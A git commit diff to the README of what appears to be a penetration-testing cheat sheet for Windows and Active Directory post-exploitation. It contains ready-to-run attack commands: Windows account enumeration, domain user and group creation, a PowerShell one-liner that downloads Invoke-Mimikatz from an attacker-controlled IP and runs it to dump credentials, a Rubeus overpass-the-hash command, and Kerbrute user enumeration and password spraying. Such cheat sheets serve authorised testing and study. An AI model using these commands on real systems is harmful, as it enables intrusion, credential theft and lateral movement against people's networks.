Update README.md
This commit is contained in:
@@ -668,6 +668,8 @@ download {FILE.exe}
|
||||
|
||||

|
||||
|
||||
[https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks](https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks)
|
||||
|
||||
```bash
|
||||
# Enumerate all local accounts
|
||||
net user
|
||||
@@ -687,11 +689,15 @@ net user {USERNAME} {PASSWORD} /add /domain
|
||||
# Add user to group
|
||||
net group "{GROUP}" {USERNAME} /add
|
||||
|
||||
# MimiKatz Cred Dump
|
||||
# MimiKatz Cred Dump Pass the Hash
|
||||
sekurlsa::logonpasswords
|
||||
IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds
|
||||
IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
|
||||
|
||||
# Rubeus Overpass the hash
|
||||
rubeus.exe asktgt /domain:{DOMAIN}/user:{USER} /rc4:{NT HASH} /ptt
|
||||
klist
|
||||
|
||||
# Kerbrute Brute Force
|
||||
sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
|
||||
sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS} {user.txt} {passwords.txt}
|
||||
|
||||
Reference in New Issue
Block a user